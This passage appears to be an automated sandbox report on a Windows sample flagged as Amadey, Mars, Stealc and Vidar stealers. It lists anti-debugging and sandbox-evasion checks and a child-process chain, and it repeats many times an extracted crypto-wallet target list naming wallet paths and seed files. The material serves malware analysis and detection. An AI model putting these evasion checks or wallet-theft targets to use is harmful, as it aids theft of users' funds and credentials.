Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000073C000.00000040.00000001.01000000.00000003.sdmp, 6e6e496542.exe, 0000000C.00000002.2416642437.000000000064C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Code function: 8_2_04F00D13 rdtsc 8_2_04F00D13
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C7F5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C7FC410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F4643B mov eax, dword ptr fs:[00000030h] 10_2_00F4643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F4A1A2 mov eax, dword ptr fs:[00000030h] 10_2_00F4A1A2
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C7CB66C
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C7CB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe" Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GCGHCBKFCF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe "C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe "C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CB341 cpuid 0_2_6C7CB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7935A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C7935A0
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A1F60 GetUserNameA, 12_2_7F7A1F60
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 15.2.explorti.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.AFBFHDBKJE.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.3033347439.0000000000F11000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2400424009.0000000000F11000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2352102436.00000000000F1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2992298681.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2311882782.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2345493680.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2359971482.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3337643096.0000000000F11000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6e6e496542.exe PID: 6448, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.Rnteb46TuM.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.6e6e496542.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2295449194.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2416642437.0000000000411000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Rnteb46TuM.exe PID: 6408, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop 